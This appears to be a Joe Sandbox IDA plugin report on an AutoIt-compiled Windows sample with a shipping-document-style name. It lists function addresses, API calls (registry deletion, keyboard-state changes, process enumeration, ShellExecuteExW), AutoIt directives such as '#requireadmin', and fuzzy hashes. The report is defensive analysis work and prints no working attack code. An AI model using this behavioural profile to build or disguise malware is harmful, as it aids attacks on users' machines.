WSAGetLastError.WSOCK32(00000000), ref: 006D96F8
htons.WSOCK32(?,?,?,00000000,?), ref: 006D97AA
inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,0071DC00), ref: 006D9765

Part of subcall function 006BD2FF: _strlen.LIBCMT ref: 006BD309

_strlen.LIBCMT ref: 006D9800

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: ErrorLast_strlen$htonsinet_ntoaselect
String ID:
API String ID: 3480843537-0
Opcode ID: 5cf66e71794e5c45b9934af632d8a7f6a5ec011c2d2398c96925821b273e4aaf
Instruction ID: 3a99da7a6df75806cf0654b29043dd50311b1c779059d691ad02db1fb9d5a322
Opcode Fuzzy Hash: 5cf66e71794e5c45b9934af632d8a7f6a5ec011c2d2398c96925821b273e4aaf
Instruction Fuzzy Hash: CE81EF31904240AFC750EF64CC95EABB7EAEF89714F104A1EF5559B291EB30DD04CBAA

Function 006AA979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 006AA991

Part of subcall function 006A7D7C: __FF_MSGBANNER.LIBCMT ref: 006A7D91
Part of subcall function 006A7D7C: __NMSG_WRITE.LIBCMT ref: 006A7D98
Part of subcall function 006A7D7C: __malloc_crt.LIBCMT ref: 006A7DB8

__lock.LIBCMT ref: 006AA9A4
__lock.LIBCMT ref: 006AA9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00736DE0,00000018,006B5E7B,?,00000000,00000109), ref: 006AAA0C
EnterCriticalSection.KERNEL32(8000000C,00736DE0,00000018,006B5E7B,?,00000000,00000109), ref: 006AAA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 006AAA39

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 0a4c612f7d0e11edf7afc3f6e6d37703a5f55753d187689dd2f7b5ca1b2125d8
Instruction ID: 10dbe3e2c2e5463ac9c6c93658f72c1e4aff3743f0b04e7920b3cc87b688c87b
Opcode Fuzzy Hash: 0a4c612f7d0e11edf7afc3f6e6d37703a5f55753d187689dd2f7b5ca1b2125d8
Instruction Fuzzy Hash: 9F4118719006019BEB14AFE8DA4479CB7E26F03324F14831EE625AB2D2DB789C41CF99

Function 006E8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006E8EE4
GetDC.USER32(00000000), ref: 006E8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006E8EF7
ReleaseDC.USER32(00000000,00000000), ref: 006E8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 006E8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006E8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006EBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 006E8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006E8FAA

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 4c023f439a7265de2d2dd0bc5caa31b462bf36079d15eaa3a67bc0b267d18985
Instruction ID: b612eeb27d70fc9924a39ed72ff7a6cc12aaa6f163e3d8f41ea27d8da35487d5
Opcode Fuzzy Hash: 4c023f439a7265de2d2dd0bc5caa31b462bf36079d15eaa3a67bc0b267d18985
Instruction Fuzzy Hash: 55318F72101214BFEB208F91CC49FEA3BAAEF49755F044155FE089A291CA799C41CB74

Function 006F0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069B34E: GetWindowLongW.USER32(?,000000EB), ref: 0069B35F

GetSystemMetrics.USER32(0000000F), ref: 006F016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 006F038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006F03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 006F03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006F03FF
ShowWindow.USER32(00000003,00000000), ref: 006F0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 006F0440

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 24087a3be112c5b02506cff647aac1663d803a38bc8fd12e28804a3bd488949c
Instruction ID: aa6eb2187cdde70af6c9c4b0beaa3d1006f303f14ec79c79bebd02c87ac7e340
Opcode Fuzzy Hash: 24087a3be112c5b02506cff647aac1663d803a38bc8fd12e28804a3bd488949c
Instruction Fuzzy Hash: FAA1AF3560061AEFEB18CF68C9857FDBBB2BF08741F088215EE54A7291DB74AD51CB90

Function 0069AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e783d96b989fda69e9759bf88bb141065fe603c1eaa2a490b8ae38e8f0ddd1d5
Instruction ID: 887f641b513d74bb3bbf78b3c4602c6055672be8702df5b2cfb396458421b856
Opcode Fuzzy Hash: e783d96b989fda69e9759bf88bb141065fe603c1eaa2a490b8ae38e8f0ddd1d5
Instruction Fuzzy Hash: 95713A71900109EFCF14CF98CC89ABEBBBAFF85314F148149F915A6251C735AA52CBA5

Function 006E2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006E225A
_memset.LIBCMT ref: 006E2323
ShellExecuteExW.SHELL32(?), ref: 006E2368

Part of subcall function 0068936C: __swprintf.LIBCMT ref: 006893AB
Part of subcall function 0068936C: __itow.LIBCMT ref: 006893DF

Part of subcall function 0069C6F4: _wcscpy.LIBCMT ref: 0069C717

CloseHandle.KERNEL32(00000000), ref: 006E242F
FreeLibrary.KERNEL32(00000000), ref: 006E243E

Strings

@, xrefs: 006E2334

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: 85299b99d2b69aa190199472ec0977fdc33ed3437b60f690a3c43eb0935d0a95
Instruction ID: 69eb7042ff94ddb9b11b2a03d5be4379877f18eb3cf0f5c0bff659ca6ebb62fc
Opcode Fuzzy Hash: 85299b99d2b69aa190199472ec0977fdc33ed3437b60f690a3c43eb0935d0a95
Instruction Fuzzy Hash: FA717C7190061ADFCF15EFA5C8919AEB7FAFF48310F108159E855AB391CB34AD41CB94

Function 006C3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 006C3C02
GetKeyboardState.USER32(?), ref: 006C3C17
SetKeyboardState.USER32(?), ref: 006C3C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006C3CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006C3CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006C3D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006C3D26

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 3ffe8a95dd19d3f0e50ec210f1f3316c45df34428df74a8241ff679c219adee4
Instruction ID: da831b8c73dd35cd4346b06e0eb974b94ea5ebdb54e77638aeba8d147fa94440
Opcode Fuzzy Hash: 3ffe8a95dd19d3f0e50ec210f1f3316c45df34428df74a8241ff679c219adee4
Instruction Fuzzy Hash: E251E5A05047E53DFB3287648C55FFABEAAEF06300F08C48DE0D656AC2D695EE84D754

Function 006E3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 006E3DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006E3DCB
FreeLibrary.KERNEL32(00000000), ref: 006E3E80

Part of subcall function 006E3D72: RegCloseKey.ADVAPI32(?), ref: 006E3DE8
Part of subcall function 006E3D72: FreeLibrary.KERNEL32(?), ref: 006E3E3A
Part of subcall function 006E3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 006E3E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 006E3E25

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: bc6c1d13d50bc01475f21babe86d1c44ab84d898679e4cbc4a3458b5fc6af536
Instruction ID: dbbcdcbe22e3669e75026ca3201b6a61ddd47657ea72413f3871b5a1499ca942
Opcode Fuzzy Hash: bc6c1d13d50bc01475f21babe86d1c44ab84d898679e4cbc4a3458b5fc6af536
Instruction Fuzzy Hash: 52311CB1902219BFDB149BD1DC89AFFB7BDEF08300F00416AE512A3250EA749F859B64

Function 006E8FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006E8FE7
GetWindowLongW.USER32(00CABBB0,000000F0), ref: 006E901A
GetWindowLongW.USER32(00CABBB0,000000F0), ref: 006E904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006E9081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006E90AB
GetWindowLongW.USER32(00000000,000000F0), ref: 006E90BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006E90D6

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 3a6d6f4572d01f7b4db697429d62c8b13e0681e59c0154d022c61a8604215d01
Instruction ID: d744c4fd7763b2607a1b4a58cb9808780c05ad56da3473c662ffb1e6e3463a7b
Opcode Fuzzy Hash: 3a6d6f4572d01f7b4db697429d62c8b13e0681e59c0154d022c61a8604215d01
Instruction Fuzzy Hash: 19314374201354DFDB20CF59DC88FA433A6EB4A354F5582A9F5088B2B2CF76AC80CB55

Function 006C08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006C08F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006C0918
SysAllocString.OLEAUT32(00000000), ref: 006C091B
SysAllocString.OLEAUT32(?), ref: 006C0939
SysFreeString.OLEAUT32(?), ref: 006C0942
StringFromGUID2.OLE32(?,?,00000028), ref: 006C0967
SysAllocString.OLEAUT32(?), ref: 006C0975

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: cdb918fa673894dacc2c3ee03159b562d5e40a2da039c38c365d73c4743d6688
Instruction ID: c122b0e18a87397525bca19664c5ee4f566c53e2bcc0b68fbc359a67927536a7
Opcode Fuzzy Hash: cdb918fa673894dacc2c3ee03159b562d5e40a2da039c38c365d73c4743d6688
Instruction Fuzzy Hash: 0E217476601219EFEF109BA8CC88EBB73EDEB09360B40C229F915DB251DA74EC458764

Function 006C2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 006C2485
__wcsnicmp.LIBCMT ref: 006C24A6
__wcsnicmp.LIBCMT ref: 006C24C0

Strings

#notrayicon, xrefs: 006C247D
#OnAutoItStartRegister, xrefs: 006C24BA
#requireadmin, xrefs: 006C24A0

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 3b132fb27aa069ad4fdd9016580f0a3a717c3816fba5978834d4846790d1d0a4
Instruction ID: 6b489541c7292d1bfdd60c7539c6b82654d570f20a516db097391d9ddca0d03a
Opcode Fuzzy Hash: 3b132fb27aa069ad4fdd9016580f0a3a717c3816fba5978834d4846790d1d0a4
Instruction Fuzzy Hash: FE21287220451267D724BB24DD22FFB73DFEF65310F50802EFC4697181E6659D9282A9

Function 006C0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006C09CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006C09F1
SysAllocString.OLEAUT32(00000000), ref: 006C09F4
SysAllocString.OLEAUT32 ref: 006C0A15
SysFreeString.OLEAUT32 ref: 006C0A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 006C0A38
SysAllocString.OLEAUT32(?), ref: 006C0A46

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: dd3ff08f3fbd28894aa62ca39c12a5594bdd0c2ab475cc4993f902ff5b232a4f
Instruction ID: 1924f1ac3538aab7c43f350ef2d2aa768ae7847833d5113fc5017565f5de753b
Opcode Fuzzy Hash: dd3ff08f3fbd28894aa62ca39c12a5594bdd0c2ab475cc4993f902ff5b232a4f
Instruction Fuzzy Hash: BE213275604204EFEB10DBE8DC89EBA77EDEF08360750C129F909CB2A1EA74EC418764

Function 006EA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0069D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0069D1BA
Part of subcall function 0069D17C: GetStockObject.GDI32(00000011), ref: 0069D1CE
Part of subcall function 0069D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0069D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006EA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006EA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006EA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006EA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006EA360

Strings

Msctls_Progress32, xrefs: 006EA2FE

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 715069349c606f285a4e54a7cfeb1ac51a7556d442783f514dd117b807e0f5e5
Instruction ID: cc327d913558f52e55918506f239ad9802e646bc50e6948a9d77894a1c72a338
Opcode Fuzzy Hash: 715069349c606f285a4e54a7cfeb1ac51a7556d442783f514dd117b807e0f5e5
Instruction Fuzzy Hash: CD1193B1150219BEEF155FA1CC85EE77F6EFF09798F014115FA04A60A0C776AC21DBA4

Function 0069CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0069CCF6
GetWindowRect.USER32(?,?), ref: 0069CD37
ScreenToClient.USER32(?,?), ref: 0069CD5F
GetClientRect.USER32(?,?), ref: 0069CE8C
GetWindowRect.USER32(?,?), ref: 0069CEA5

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: cabc50aef379b0e2c60bf990b1eb8676eb0e0a6b7a5e0dc1834f4e4c0d702603
Instruction ID: ce8d397bca8882d087c02ef262d93c6cfc344516496ac2aaa7c41580ed129418
Opcode Fuzzy Hash: cabc50aef379b0e2c60bf990b1eb8676eb0e0a6b7a5e0dc1834f4e4c0d702603
Instruction Fuzzy Hash: 8AB15979900249DBDF10CFA8C4807EDBBB6FF08350F149529ED5AAB750DB31AA51CB64

Function 006E1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 006E1C18
Process32FirstW.KERNEL32(00000000,?), ref: 006E1C26
__wsplitpath.LIBCMT ref: 006E1C54

Part of subcall function 006A1DFC: __wsplitpath_helper.LIBCMT ref: 006A1E3C

_wcscat.LIBCMT ref: 006E1C69
Process32NextW.KERNEL32(00000000,?), ref: 006E1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 006E1CF1

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: 473449a5fb1c956a49db7da116de105f03335e2ec4a384591fb52fc848c344e4
Instruction ID: 8b966f56c6e6c5edd1cc8300a704ba85018796236015d24ba26e3163d4d0389f
Opcode Fuzzy Hash: 473449a5fb1c956a49db7da116de105f03335e2ec4a384591fb52fc848c344e4
Instruction Fuzzy Hash: 52518D711043409FD720EF24C895EABB7EDEF89754F004A1EF58697251EB70D904CBA6

Function 006E2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006E2BB5,?,?), ref: 006E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006E30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006E30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006E3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006E313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 006E317E
RegCloseKey.ADVAPI32(00000000), ref: 006E318B

Memory Dump Source

Source File: 00000000.00000002.2160141082.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true

Associated: 00000000.00000002.2160115844.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160211904.000000000072E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160264720.000000000073A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2160287980.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_680000_MVV ALIADO - S-REQ-19-00064 40ft 1x20.jbxd

Similarity

